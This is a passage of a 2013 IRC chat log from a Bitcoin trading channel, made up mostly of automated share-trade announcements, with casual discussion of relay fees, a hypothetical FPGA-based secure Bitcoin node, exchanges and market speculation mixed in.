aren't selling better on Bitfunder May 09 02:35:17 they used to have the highest AM volume til this week May 09 02:36:46 [BTCTC] [TAT.ASICMINER] 150 @ 0.013899 = 2.0849 BTC [+] May 09 02:38:01 [BTCTC] [TAT.ASICMINER] 72 @ 0.01395 = 1.0044 BTC [+] May 09 02:38:36 [BTCTC] [ASICMINER-PT] 4 @ 1.399 = 5.596 BTC [+] May 09 02:40:16 [BTCTC] [TAT.ASICMINER] 28 @ 0.01395 = 0.3906 BTC [+] May 09 02:41:52 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [+] May 09 02:42:16 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [+] May 09 02:42:34 [BTCTC] [ASICMINER-PT] 38 @ 1.4 = 53.2 BTC [+] May 09 02:42:40 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [+] May 09 02:42:56 [BTCTC] [ASICMINER-PT] 2 @ 1.4 = 2.8 BTC [+] May 09 02:43:06 how does the shmarbitrage on asicminer look across btctc and havelock and all dem? May 09 02:44:19 [BTCTC] [TAT.ASICMINER] 20 @ 0.014 = 0.28 BTC [+] May 09 02:44:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.014 = 0.7 BTC [+] May 09 02:45:50 [BTCTC] [ASICMINER-PT] 1 @ 1.485 BTC [+] May 09 02:46:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.01425 BTC [+] May 09 02:46:54 [BTCTC] [TAT.ASICMINER] 19 @ 0.01425 = 0.2708 BTC [+] May 09 02:48:05 http://www.nytimes.com/aponline/2013/05/08/world/europe/ap-eu-belgium-diamond-heist.html May 09 02:48:15 check it out, they caught the ocean eleven ppls. May 09 02:48:54 [BTCTC] [TAT.ASICMINER] 15 @ 0.0145 = 0.2175 BTC [+] May 09 02:50:16 [BTCTC] [TAT.ASICMINER] 19 @ 0.0147 = 0.2793 BTC [+] May 09 02:50:42 [BTCTC] [TAT.ASICMINER] 29 @ 0.0147 = 0.4263 BTC [+] May 09 02:50:45 [BTCTC] [ASICMINER-PT] 8 @ 1.489 = 11.912 BTC [+] May 09 02:52:24 [BTCTC] [ASICMINER-PT] 19 @ 1.489 = 28.291 BTC [+] May 09 02:53:50 [BTCTC] [TAT.ASICMINER] 95 @ 0.015 = 1.425 BTC [+] May 09 02:56:38 [BTCTC] [ASICMINER-PT] 1 @ 1.41 BTC [-] May 09 03:01:01 mircea_popescu i recently finished a book called 'Flawless' about another belgian diamond heist .. which i think they got away with May 09 03:01:14 [BTCTC] [ASICMINER-PT] 4 @ 1.4 = 5.6 BTC [-] May 09 03:01:24 ah ? May 09 03:01:46 when you first posted that i thought it might be the same May 09 03:01:48 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [-] May 09 03:02:19 but no, the book was about an older one where they robbed the antwerp diamond center May 09 03:03:43 [BTCTC] [ASICMINER-PT] 1 @ 1.41 BTC [+] May 09 03:04:10 [BTCTC] [ASICMINER-PT] 3 @ 1.41 = 4.23 BTC [+] May 09 03:04:50 [BTCTC] [ASICMINER-PT] 1 @ 1.41 BTC [+] May 09 03:05:41 [BTCTC] [ASICMINER-PT] 4 @ 1.401 = 5.604 BTC [-] May 09 03:08:11 the antwerp heist was awesome May 09 03:08:17 too bad homie didnt take out the trash correctly May 09 03:12:30 [BTCTC] [ASICMINER-PT] 2 @ 1.401 = 2.802 BTC [-] May 09 03:12:33 ah i think i remember that one May 09 03:12:58 snatch is sort of loosely inspiredby it i think May 09 03:13:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.014 = 0.042 BTC [-] May 09 03:13:44 [BTCTC] [ASICMINER-PT] 1 @ 1.401 BTC [-] May 09 03:18:23 damn you bitcoin network May 09 03:18:26 accept my transaction May 09 03:18:31 i gave you a whole 0.0001 for it! May 09 03:22:39 [BTCTC] [ASICMINER-PT] 1 @ 1.380001 BTC [-] May 09 03:22:43 [BTCTC] [ASICMINER-PT] 1 @ 1.3605 BTC [-] May 09 03:22:47 [BTCTC] [ASICMINER-PT] 1 @ 1.3605 BTC [-] May 09 03:22:58 [BTCTC] [ASICMINER-PT] 1 @ 1.3601 BTC [-] May 09 03:23:02 [HAVELOCK] [ASICM] 1 @ 0.014 BTC [+] May 09 03:23:10 [BTCTC] [ASICMINER-PT] 10 @ 1.36 = 13.6 BTC [-] May 09 03:23:52 [BTCTC] [ASICMINER-PT] 1 @ 1.365 BTC [+] May 09 03:23:56 [BTCTC] [ASICMINER-PT] 1 @ 1.360001 BTC [-] May 09 03:30:27 inhies: needs >=0.001 iirc May 09 03:31:01 dice spam has 0.001 anyway May 09 03:31:12 hrm, maybe my dumbass thought there was an extra zero in there May 09 03:31:14 ah well May 09 03:31:35 nope May 09 03:31:40 been using 0.0001 for awhile now May 09 03:31:46 market price gonna drop i think May 09 03:32:20 yup May 09 03:32:28 [BTCTC] [ASICMINER-PT] 1 @ 1.400949 BTC [+] May 09 03:33:03 jesus May 09 03:34:02 [HAVELOCK] [ASICM] 125 @ 0.014 = 1.75 BTC [+] May 09 03:34:06 [BTCTC] [TAT.ASICMINER] 6 @ 0.01398 = 0.0839 BTC [-] May 09 03:34:12 !ticket bt asicminer-pt May 09 03:34:21 !ticker bt asicminer-pt May 09 03:34:23 [BTCT:ASICMINER-PT] 1D: 1.24 / 1.34552 / 1.489 (738 shares, 993 BTC), 7D: 1.12 / 1.28986 / 1.489 (1880 shares, 2424.9 BTC), 30D: 0.6269 / 1.11074 / 1.75 (7503 shares, 8333.9 BTC) May 09 03:36:17 i agree - price is rolling over - we'll retest 100 i think May 09 03:43:51 dude this is insane May 09 03:44:02 whenever this guy sells puts the price drops May 09 03:44:32 hehe May 09 03:44:44 ;;ticker May 09 03:44:45 BTCUSD ticker | Best bid: 112.04981, Best ask: 112.05525, Bid-ask spread: 0.00544, Last trade: 112.04980, 24 hour volume: 62523.10961762, 24 hour low: 109.50000, 24 hour high: 116.77700, 24 hour vwap: 113.32966 May 09 03:44:57 it wont break 100 May 09 03:45:34 [BTCTC] [ASICMINER-PT] 1 @ 1.388 BTC [-] May 09 03:45:38 nope May 09 03:46:02 [HAVELOCK] [ASICM] 20 @ 0.014 = 0.28 BTC [+] May 09 03:48:55 I tend to agree that 100 will likely hold, but chart say to me "retest" May 09 03:49:19 well, if it goes to 80 i stand to make what, 10k or so ? May 09 03:49:57 lol May 09 03:50:51 nice May 09 03:53:02 [HAVELOCK] [ASICM] 4 @ 0.014 = 0.056 BTC [+] May 09 03:53:04 [HAVELOCK] [ASICM] 96 @ 0.0141 = 1.3536 BTC [+] May 09 03:57:04 [HAVELOCK] [ASICM] 3 @ 0.014 = 0.042 BTC [-] May 09 03:57:06 [HAVELOCK] [ASICM] 3 @ 0.0141 = 0.0423 BTC [+] May 09 03:57:30 [MPEX] [S.MPOE] 4321 @ 0.00071284 = 3.0802 BTC [-] May 09 03:57:31 [MPEX] [S.MPOE] 13229 @ 0.00071311 = 9.4337 BTC [+] May 09 03:58:01 [HAVELOCK] [ASICM] 1 @ 0.0141 BTC [+] May 09 03:58:02 [HAVELOCK] [ASICM] 97 @ 0.0141 = 1.3677 BTC [+] May 09 03:59:02 [HAVELOCK] [ASICM] 2 @ 0.014 = 0.028 BTC [-] May 09 03:59:40 [MPEX] [S.MPOE] 2550 @ 0.00071309 = 1.8184 BTC [-] May 09 04:00:02 [HAVELOCK] [ASICM] 50 @ 0.01405 = 0.7025 BTC [+] May 09 04:00:37 mircea_popescu: what's your take on this abomination: https://bitcointalk.org/index.php?topic=196138.0 May 09 04:01:43 seems like the "official" dev team has declared war on SDICE. May 09 04:02:02 [HAVELOCK] [ASICM] 97 @ 0.0141 = 1.3677 BTC [+] May 09 04:02:10 how does it affect dice? May 09 04:02:18 ya srsly. May 09 04:02:25 been discussed before : they have no options May 09 04:02:43 how's that? May 09 04:02:45 not enough full nodes running, and there's no relay tx fee so there's no way to limit uneconomic mempool use May 09 04:02:56 I thought it just discouraged people from sending amounts that are too small to be relayed anyway May 09 04:02:59 lemme find the chat May 09 04:03:20 ie, protects noobs from long txn delays May 09 04:04:02 [HAVELOCK] [ASICM] 20 @ 0.0142 = 0.284 BTC [+] May 09 04:04:04 May 05 22:22:16 im not sure why they're not just letting the tx fee decide May 09 04:04:04 May 05 22:22:19 but whatever. May 09 04:04:04 May 05 22:22:42 ah, actually, there is a reason May 09 04:04:04 May 05 22:22:49 we are choked by nonadoption/node death May 09 04:04:04 May 05 22:23:07 consequently there's no way to outcompete dust txs, cause you don't pay a fee to be relayed May 09 04:04:04 May 05 22:23:44 tbh the no-relay-fee is probably the grossest fundamental oversight in the design of bitcoin May 09 04:04:21 almost seems like this is a deliberate ploy to prolong the life of litecoin. May 09 04:05:17 one could easily add relay fees without breaking the protocol. May 09 04:05:37 perhaps. May 09 04:05:47 depend a lot on the definitions of one and easily. May 09 04:06:29 well, say, I (or another literate person) could do so May 09 04:06:58 but who exactly would use my fork May 09 04:07:53 so this definition of one isn't very good :) May 09 04:08:19 the devs' decision bothers me for "meta" reasons. that is, the dev team has enough influence that it could add all kinds of vaguely questionable things and they will come into use on the majority of the network. May 09 04:08:19 i agree with mp - no fee for relay is a fundemental problem with bitcoin May 09 04:09:06 pgp: "fundamental" problem implies that it could not be dealt with other than by breaking the protocol, no? May 09 04:09:24 no May 09 04:09:32 fundamental simply means that it was there at the time of its birth May 09 04:10:02 well, I suppose it could be reticified, but not easily... May 09 04:10:08 you're thinking insoluble/irresolvable/etc May 09 04:10:19 rectified May 09 04:10:50 pgp: just run a node that demands to be paid X satoshi before it relays transactions <=Y satoshi. May 09 04:12:16 the accounting for this is nontrivial. May 09 04:12:30 mircea_popescu: unrelated thought: do you suppose there could be a market for a hardware implementation of Bitcoin? May 09 04:13:04 yes. May 09 04:13:12 that is to say, a box that implements a full node, from scratch, with no unix/c/c++/code written by anyone in the past on it. with complete docs under NDA. May 09 04:13:15 however, the asic production is the gateway to thgat. May 09 04:13:22 considering how poorly that fares yet, too soon. May 09 04:13:57 but that requires a transaction to specify me as an output - what we need is a generalized method of paying a node operator who identity is not known at the time the transaction is submitted... May 09 04:14:06 I'm thinking of a node (not a miner, note) written for a custom architecture, running on an fpga (of the client's choice) May 09 04:14:15 the only peripheral needed is an ethernet controller May 09 04:14:27 and so, one can use any of a thousand commercial fpga dev boards May 09 04:15:07 why May 09 04:15:13 the objective would be: serious security. May 09 04:15:19 of the military kind May 09 04:15:22 ? May 09 04:16:20 a system which includes consumer PC components or traditional software is insecure from birth. May 09 04:16:59 note the existence of China's "Dragon" CPU effort, or the Russian equivalent May 09 04:17:00 i don't imagine bitcoin banks would work any other way once we're mature. May 09 04:17:16 so secure like SCADA? ;) May 09 04:17:18 you don't want x86, unix, etc. (much less microcrap) in a ballistic missile. esp. one aimed at the U.S. May 09 04:17:35 nobody could sleep otherwise. May 09 04:17:47 secure like a Russian ICBM. not like the idiot western SCADAs. May 09 04:18:09 asciilifeform actually the russians were reusing linux for that purpose May 09 04:18:19 they are trying to phase out even linux May 09 04:18:47 to understand why one might want to do this, see: http://underhanded.xcott.com/ May 09 04:18:52 I don't see what you are solving May 09 04:19:10 dub: solving this: http://cm.bell-labs.com/who/ken/trust.html May 09 04:19:49 yeah but why is a PGA more trustable May 09 04:19:58 and this: http://it.slashdot.org/story/10/03/27/2145255/remote-malware-injection-via-flaw-in-network-card May 09 04:19:58 unchangeable dub. May 09 04:19:59 noted... have you been reading about all sorts of "counterfeit" chips coming out of china with built in backdoors. Just because its hardware, doesn't mean it can be blindly trusted... May 09 04:20:04 once it's burned, it's burned. May 09 04:20:09 well, no May 09 04:20:20 pgp this is true of course. May 09 04:20:25 [BTCTC] [ASICMINER-PT] 3 @ 1.4 = 4.2 BTC [+] May 09 04:20:27 asciilifeform will want his very own foundry. May 09 04:20:40 of course May 09 04:20:48 there are numerous available FPGAs which have a programming interface which is not accessible from the routing fabric (i.e. separate pins.) May 09 04:21:29 [BTCTC] [ASICMINER-PT] 2 @ 1.4 = 2.8 BTC [+] May 09 04:22:11 the product I envision would be a single-purpose device which runs the block chain and only the block chain. the FPGA code implementing the instruction set, firmware, etc. would form a complete description of the system. May 09 04:22:44 perhaps run into trouble as the blockchain goes over 1tb May 09 04:22:48 so FPGA + checksum = really secure? May 09 04:22:48 the client would choose the fpga and the board, and could even physically supply it May 09 04:23:00 1tb is chump change if you attach mechanical storage. May 09 04:23:09 [BTCTC] [ASICMINER-PT] 5 @ 1.4 = 7 BTC [+] May 09 04:23:18 preferably RAID-5 with drives from different manufacturers May 09 04:23:31 ao May 09 04:23:33 so May 09 04:23:35 lol May 09 04:23:42 supplied in sealed boxes, with manufacture dates predating the design of the hypothetical system. May 09 04:23:43 block 235234 is older than block 235233 May 09 04:23:45 wtf May 09 04:24:13 the idea would be to have an implementation of BTC which could be understood in its physical entirety. May 09 04:24:14 asciilifeform: i like the way you think... May 09 04:24:34 diff manufacturers and raid don't mix so well May 09 04:24:46 if performance isn't critical, they mix just fine May 09 04:24:46 inhies some reorg. May 09 04:24:55 [BTCTC] [ASICMINER-PT] 1 @ 1.4149 BTC [+] May 09 04:24:57 all I'm doing in this thought experiment is applying the traditional principles of serious weapons system design to BTC. May 09 04:25:01 [BTCTC] [ASICMINER-PT] 10 @ 1.415 = 14.15 BTC [+] May 09 04:25:13 [BTCTC] [ASICMINER-PT] 10 @ 1.42 = 14.2 BTC [+] May 09 04:25:30 [09:23:18] preferably RAID-5 with drives from different manufacturers May 09 04:25:31 [BTCTC] [ASICMINER-PT] 5 @ 1.45 = 7.25 BTC [+] May 09 04:25:33 all two of them. May 09 04:25:34 mircea_popescu: wat? May 09 04:25:41 [BTCTC] [ASICMINER-PT] 7 @ 1.479 = 10.353 BTC [+] May 09 04:25:49 I don't see why this is better than some kind of signed software May 09 04:25:56 any "weapons design" resources links that yo care to share? May 09 04:25:56 [BTCTC] [ASICMINER-PT] 8 @ 1.479 = 11.832 BTC [+] May 09 04:26:00 with a rolling key protocol oslt May 09 04:26:17 [BTCTC] [ASICMINER-PT] 10 @ 1.45 = 14.5 BTC [-] May 09 04:26:23 [BTCTC] [ASICMINER-PT] 10 @ 1.48 = 14.8 BTC [+] May 09 04:26:35 dub: PC software is running in a hostile environment. half a dozen of peripherals with firmware of unknown provenance. a multitasking OS with decades of cruft. etc May 09 04:26:39 [BTCTC] [ASICMINER-PT] 1 @ 1.48889 BTC [+] May 09 04:26:47 you added ethernet to you pga though May 09 04:26:50 game over. May 09 04:26:54 [BTCTC] [ASICMINER-PT] 58 @ 1.489 = 86.362 BTC [+] May 09 04:27:08 lol May 09 04:27:11 dub: no card. just the transformer and plug May 09 04:27:17 dub: yes May 09 04:27:25 [BTCTC] [ASICMINER-PT] 10 @ 1.45 = 14.5 BTC [-] May 09 04:27:33 I can break whatever you are trying to achieve on the wire May 09 04:27:34 I have an FPGA board right here on my desk, with a completely verifiable TCP/IP stack May 09 04:27:45 [BTCTC] [ASICMINER-PT] 1 @ 1.489 BTC [+] May 09 04:27:53 dub: if you can break the BTC crypto, don't settle for small change, go pwn the world May 09 04:27:54 what kind of board? May 09 04:28:00 [BTCTC] [ASICMINER-PT] 10 @ 1.45 = 14.5 BTC [-] May 09 04:28:12 [BTCTC] [ASICMINER-PT] 1 @ 1.488999 BTC [+] May 09 04:28:16 dub: an ordinary Xilinx proto board May 09 04:28:20 [BTCTC] [ASICMINER-PT] 1 @ 1.4899 BTC [+] May 09 04:28:25 ml605? May 09 04:28:25 [BTCTC] [ASICMINER-PT] 1 @ 1.49 BTC [+] May 09 04:28:37 pgp: several, actually May 09 04:28:47 I have several as well May 09 04:28:51 good platform May 09 04:28:52 mircea_popescu: one problem: AFAIK you're the only prospective buyer. interested? what would your specific requirements be? May 09 04:28:55 [BTCTC] [ASICMINER-PT] 6 @ 1.49 = 8.94 BTC [+] May 09 04:29:19 [BTCTC] [ASICMINER-PT] 10 @ 1.46 = 14.6 BTC [-] May 09 04:29:43 i'm more like a prospective producer than a prospective buyer. May 09 04:30:04 [BTCTC] [ASICMINER-PT] 1 @ 1.49 BTC [+] May 09 04:30:14 mircea_popescu: you are already developing exactly this, in-house? or intend to? May 09 04:31:02 i guess the original yes belied as much, nehj ? May 09 04:31:31 [BTCTC] [ASICMINER-PT] 4 @ 1.491005 = 5.964 BTC [+] May 09 04:31:38 mircea_popescu: do you intend to offer it for sale? May 09 04:32:02 [HAVELOCK] [ASICM] 124 @ 0.014 = 1.736 BTC [-] May 09 04:32:09 [BTCTC] [ASICMINER-PT] 10 @ 1.4978 = 14.978 BTC [+] May 09 04:32:12 in principle. this is all very early tbh. May 09 04:32:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.013875 = 0.1388 BTC [-] May 09 04:32:44 [BTCTC] [ASICMINER-PT] 20 @ 1.48 = 29.6 BTC [-] May 09 04:33:06 [BTCTC] [ASICMINER-PT] 10 @ 1.499 = 14.99 BTC [+] May 09 04:33:16 [BTCTC] [ASICMINER-PT] 20 @ 1.499 = 29.98 BTC [+] May 09 04:33:32 [BTCTC] [ASICMINER-PT] 35 @ 1.49999 = 52.4997 BTC [+] May 09 04:34:32 [BTCTC] [ASICMINER-PT] 10 @ 1.49 = 14.9 BTC [-] May 09 04:36:15 so May 09 04:36:20 who said asicminer might be the next pirate May 09 04:36:28 lol May 09 04:36:38 it was either dub or mp May 09 04:37:08 dub May 09 04:37:39 I said pirate level event May 09 04:38:02 [BTCTC] [ASICMINER-PT] 3 @ 1.49 = 4.47 BTC [-] May 09 04:38:12 as in, lots of people lose the farm May 09 04:38:34 yeah thats what I mean May 09 04:38:37 i wonder what that event enum looks like... May 09 04:38:45 so, Im buying people's dmc shares out with asicminer shares May 09 04:38:53 buy mine May 09 04:39:03 pretty much would require death/arrest of friedcat, gov intervention, or major fires May 09 04:39:12 dub i keep trying to buy yours May 09 04:39:18 but youre too slow May 09 04:39:33 no, Diablo-D3 should buy my DMC share May 09 04:39:36 oh May 09 04:39:45 and I'm not selling now :) May 09 04:39:48 pgp: typedef struct { ILLEGAL, PIRATE, BITCOINICA, FORUM_IS_DOWN, PRICE_IS_DOWN, NOTHING = -1 } fuck_t; May 09 04:39:48 hehe May 09 04:39:50 smart move May 09 04:39:51 not until 2 May 09 04:40:07 dub: how many do you have? May 09 04:40:19 DMC or AM? May 09 04:40:34 DMC May 09 04:40:45 i wanna know how many AM May 09 04:40:49 :) May 09 04:41:01 Diablo-D3: try to keep up bro, I have 1 May 09 04:41:01 [HAVELOCK] [VTX] 13 @ 0.4665 = 6.0645 BTC [+] May 09 04:41:12 dub: oh, buy 10 more and I'll trade you 1 AM share May 09 04:41:18 I paid 1 satoshi for it May 09 04:41:27 can I get 9 more at that price? May 09 04:41:28 lol May 09 04:41:35 dub: probably not May 09 04:41:38 it was either dub or mp << wait wut ?! May 09 04:41:45 about 18 bitcents each atm May 09 04:41:47 mircea_popescu: it was dub May 09 04:42:10 I think my DMC share is worth more than any other May 09 04:42:15 how did i get mixed up in all this. May 09 04:42:18 its a collectors item May 09 04:42:19 [BTCTC] [TAT.ASICMINER] 8 @ 0.013875 = 0.111 BTC [-] May 09 04:43:02 [HAVELOCK] [VTX] 1 @ 0.4449 BTC [-] May 09 04:43:12 true, we should move chats to #bitcoin-trollbox May 09 04:43:36 -trollbox is superior May 09 04:43:47 it has god mode May 09 04:44:15 room has been quiet most of the day May 09 04:44:27 other than a bajillion AM trades from assbot May 09 04:45:02 [HAVELOCK] [ASICM] 31 @ 0.0141 = 0.4371 BTC [+] May 09 04:45:09 ya. 10k am trades worth 10btc. 10 mpex trades worth 10k btc. May 09 04:45:15 story of #bitcoin-assets May 09 04:46:25 well, I'm feeling more chatty with each additional scotch... May 09 04:46:45 pgp: what flavour May 09 04:46:48 about 1550BTC in AM trades May 09 04:46:58 but yeah, mpex still wins May 09 04:47:28 i'm drinking too, which is unusual lately May 09 04:47:31 black label... May 09 04:47:36 the missus is away on business May 09 04:47:42 oh, a blend May 09 04:47:48 w/e May 09 04:47:55 drinking Stone Ruination May 09 04:48:14 and Hoegarden May 09 04:48:18 nice thing about BL is that I can get it most any place in the worldd May 09 04:48:35 nothing wrong with blends May 09 04:48:38 ya, and it'll be just as crappy everywhere :D May 09 04:49:11 I like to think of myself as "black label soluable"... May 09 04:49:23 mp is better than us all May 09 04:49:29 sometimes we need to be reminded May 09 04:49:33 lol May 09 04:49:39 lmao May 09 04:49:41 :) May 09 04:49:47 I drink a lot of jameson, tall glass with lots of water and ice a a beer replacement May 09 04:49:55 as a* May 09 04:50:06 jameson as in, jenna ? May 09 04:50:14 irisj whiskey May 09 04:50:20 irish* May 09 04:50:34 i have a couple bottles May 09 04:50:47 works with anything not good enough to drink neat May 09 04:50:59 yep May 09 04:51:20 sadly too much beer kills me May 09 04:51:32 too many calories May 09 04:51:51 gotta go with hard liquor May 09 04:51:59 and I need to be careful not to drink malts at the same pace as beer May 09 04:52:14 [BTCTC] [TAT.ASICMINER] 55 @ 0.013899 = 0.7644 BTC [+] May 09 04:52:30 been down that rabbit hole before... May 09 04:52:50 malt != beer May 09 04:53:02 no we just grew up is all May 09 04:53:04 not our fault May 09 04:53:13 happens to the best of us May 09 04:53:47 how old are you guys? May 09 04:53:55 34,000 May 09 04:54:11 I'll be 41 this month May 09 04:54:31 ugh May 09 04:54:41 im closer to 40 than 30 May 09 04:55:10 no wonder this room gets so curmudgeonous May 09 04:55:24 lol May 09 04:56:30 given my experience with bitcoin to date, I'm gonna make the assumption that I'm the oldest guy on this channel.. May 09 04:56:36 truff1es: I srsly considered buying a sports coupe at $270 May 09 04:57:08 do you know mushrooms? May 09 04:57:31 I have a sports car, its got 4 doors May 09 04:57:38 41 May 09 04:57:45 I have a sports hatchback May 09 04:57:55 not May 09 04:57:56 shrooms? May 09 04:57:57 you need a coupe to signal a proper mid life crisis May 09 04:58:21 I have a boy racer car :) May 09 04:58:32 he is called truffles, cuz? May 09 04:58:37 are you a chef? May 09 04:58:39 or a hippy? May 09 04:58:39 lowered, loud exhaust the works May 09 04:58:57 oh May 09 04:58:59 I have landrover LR4 with two kiddie seats in back... May 09 04:59:15 i have this white truffle salt i love May 09 04:59:23 lol May 09 04:59:23 not chocolate, shroomy May 09 04:59:44 white chocolate isnt even chocolate May 09 05:00:38 hmm i need to drink more slowly May 09 05:00:45 BTW... this is the BEST channel on IRC... May 09 05:00:52 ikr? May 09 05:00:56 [MPEX] [S.MPOE] 4321 @ 0.0007078 = 3.0584 BTC [-] May 09 05:00:57 [MPEX] [S.MPOE] 4479 @ 0.00070758 = 3.1693 BTC [-] May 09 05:01:01 http://polimedia.us/dtng/c/src/136597220098.jpg May 09 05:01:02 lol May 09 05:01:05 it's my fav chan by far May 09 05:01:31 thats because you aren't in -trollbox May 09 05:01:46 dub has to remind us he's better than us all teh time May 09 05:01:48 [BTCTC] [TAT.ASICMINER] 6 @ 0.013899 = 0.0834 BTC [+] May 09 05:01:56 (hey ThickAsThieves am i doing it rite ?) May 09 05:02:10 leave the hipster trolling to me plz May 09 05:02:13 its important that you remember May 09 05:02:28 ;) May 09 05:03:09 -trollbox is good concept... if only it could get critical mass... May 09 05:03:46 what is the concept behind trollbox? May 09 05:03:55 trolling, in a box May 09 05:04:02 [HAVELOCK] [ASICM] 6 @ 0.014 = 0.084 BTC [-] May 09 05:04:05 but why would the trolls limit themselves to that? May 09 05:04:10 [BTCTC] [ASICMINER-PT] 10 @ 1.45 = 14.5 BTC [-] May 09 05:04:22 speaking of which, where is our resident troll tiberiuiv? May 09 05:04:28 heh shhh May 09 05:04:29 banhammered May 09 05:04:29 banxored May 09 05:04:39 assbanned May 09 05:04:40 does anyone follow the RSI May 09 05:04:44 indicator May 09 05:05:03 RSI sure... May 09 05:05:05 i only follow the price when i am selling or buying May 09 05:05:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.013899 = 0.0278 BTC [+] May 09 05:05:38 pgp: what do you think about it atm May 09 05:07:55 sell May 09 05:08:54 all indicators are pointing to at least a short term rollover... May 09 05:09:13 [BTCTC] [ASICMINER-PT] 1 @ 1.485 BTC [+] May 09 05:09:25 100 looks likes good support, though.. May 09 05:09:37 BTCUSD ticker | Best bid: 110.01501, Best ask: 110.36000, Bid-ask spread: 0.34499, Last trade: 110.36000, 24 hour volume: 62591.71220051, 24 hour low: 108.80000, 24 hour high: 116.77700, 24 hour vwap: 113.09620 May 09 05:09:47 im seeing it horizontal right now +0 / -0 yet market price looks good May 09 05:11:15 KRS1, the only thing I'm looking at with BTC price right now is the lower curve for the past 8 mos or so May 09 05:11:23 weekly upward momentum cycle has stalled - end of week rollover is coming - MARK MY WORDS... May 09 05:11:32 if it holds we're about to go bullish more solidly May 09 05:11:33 [BTCTC] [TAT.ASICMINER] 13 @ 0.013899 = 0.1807 BTC [+] May 09 05:12:03 from pgp mouth to gods ears http://blockchained.com/depth_mtgox_15d.png May 09 05:12:47 lol May 09 05:13:18 love that chart.. May 09 05:13:56 it's like sex with random girl in bar bathroom... May 09 05:14:15 [MPEX] [S.MPOE] 4321 @ 0.00072021 = 3.112 BTC [+] May 09 05:14:16 [MPEX] [S.MPOE] 12547 @ 0.00072038 = 9.0386 BTC [+] May 09 05:14:17 err... but not really... May 09 05:14:17 [MPEX] [S.MPOE] 30018 @ 0.00072327 = 21.7111 BTC [+] May 09 05:14:33 more derivitives http://www.plus500.com/Instruments/BTCUSD May 09 05:14:38 nice site imo May 09 05:14:47 watch out mpex lol May 09 05:15:44 been out for a while May 09 05:15:48 yeah - been following this site - decent implementation.. May 09 05:15:55 heard some funny stories about them May 09 05:16:05 enought to convince me not to deposit any cash May 09 05:16:08 enough May 09 05:16:09 cfd? May 09 05:16:30 that means computational fluid dynamics to me. May 09 05:16:39 oh contract for diff May 09 05:17:14 cannot fund with bitcoin May 09 05:17:14 fail May 09 05:18:05 what stories? May 09 05:18:36 about them not payin up and such May 09 05:19:06 btw - cfd is a non-deliverable cash-settled contract... May 09 05:19:15 [BTCTC] [TAT.ASICMINER] 24 @ 0.013899 = 0.3336 BTC [+] May 09 05:19:20 i know what it is May 09 05:19:53 kako: of course you do May 09 05:19:54 im not talking about bitcoin related stuff May 09 05:19:56 thats a pretty good story..who wants to hear that May 09 05:20:05 just stories before May 09 05:20:09 bah May 09 05:20:12 stories from before May 09 05:20:23 dont think it gets any worse than that..maybe no liquidity? May 09 05:20:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.01398 = 0.0559 BTC [+] May 09 05:20:49 or a real downhome foreign rip off May 09 05:20:53 fuck - I'm out of ice... May 09 05:21:28 call up mc hammer? May 09 05:21:40 lol May 09 05:21:47 I can roll " May 09 05:22:10 "neat" when circumstances demand... May 09 05:23:53 pgp: you can always try this for quick ice: http://www.youtube.com/watch?v=x-GQk8Q96PY May 09 05:26:00 im seeing funky shit on btc-e order books..big BTC orders $10K, $70K...disappear May 09 05:27:02 [HAVELOCK] [VTX] 1 @ 0.44480001 BTC [-] May 09 05:28:48 KSR1: manipulation May 09 05:29:41 nice video - if only the laws of thermodynamics worked that way... May 09 05:30:03 heh yeh as if the changes in lighting wasnt enough ..thought it was amusing though. May 09 05:30:27 seems like its time to buy? I might be wrong though. May 09 05:30:53 although technically btc is still overbought right May 09 05:32:08 ;;goxlag May 09 05:32:09 Error: Problem retrieving gox lag. Try again later. May 09 05:32:13 goxing again? May 09 05:32:24 note sure if anyone cares, but tailer for movie adaptation of one of my favorite books (Ender's Game) was just released http://www.youtube.com/watch?v=vP0cUBi4hwE May 09 05:33:29 gox wtf? May 09 05:33:37 maybe it is time to buy indeed May 09 05:34:34 I'd wait until gox reopens the bounce down May 09 05:35:06 google for mtgox returns adwords for https://exante.eu/products/BTC/ May 09 05:35:18 some new stuff there? May 09 05:35:41 my 4 year old could run a better exchange than these jokers... May 09 05:35:50 [BTCTC] [ASICMINER-PT] 1 @ 1.48449 BTC [-] May 09 05:36:02 [BTCTC] [ASICMINER-PT] 1 @ 1.484499 BTC [+] May 09 05:36:06 pgp i dont know much about them, what can you tell May 09 05:36:20 [BTCTC] [ASICMINER-PT] 4 @ 1.4845 = 5.938 BTC [+] May 09 05:36:44 hehe you are prob right..my friend was telling me about some of their code fuckups..like they paid the cheapest developer they could get and once it was working fired him and moved on to the next sprint without testing and fixing shit ..like input validation..programming 101 May 09 05:37:11 [BTCTC] [ASICMINER-PT] 4 @ 1.4845 = 5.938 BTC [+] May 09 05:37:21 ;;seen mircea_popescu May 09 05:37:21 mircea_popescu was last seen in #bitcoin-assets 35 minutes and 24 seconds ago: (hey ThickAsThieves am i doing it rite ?) May 09 05:38:07 is this a bitcoin business being dscribed ? May 09 05:38:10 kako: nothing new - all BS May 09 05:38:13 [BTCTC] [ASICMINER-PT] 23 @ 1.4845 = 34.1435 BTC [+] May 09 05:38:30 kakobrekla yes. some people who believe that if you call yourself mercedes you're made in germany. May 09 05:38:34 exante May 09 05:38:44 i think they got some press a few weeks ago May 09 05:38:48 and buying google ads makes one successful (hey, it worked for bfl rite) May 09 05:39:08 [BTCTC] [ASICMINER-PT] 1 @ 1.484499 BTC [-] May 09 05:39:12 i have a few dozen free $100 adwords credits somewhere May 09 05:39:29 i took their classes May 09 05:39:36 bfl... when will bfl be relagated to footnote status... May 09 05:40:08 when AM hits 262TH May 09 05:40:20 wish there was a was to definitively specify that for a bitbet proposition May 09 05:40:27 and is selling cheaper better devices than BFL all day long May 09 05:40:37 pgp srsly. May 09 05:40:58 just heard gox is at $67? May 09 05:41:05 how in the hell can i place an order or two lol May 09 05:41:05 [BTCTC] [TAT.ASICMINER] 27 @ 0.0147 = 0.3969 BTC [+] May 09 05:42:02 fuckin' RIDICULOUS... May 09 05:42:15 mircea_popescu: from what I know about Romania or think I know, I think this is how I'd have to live the life: 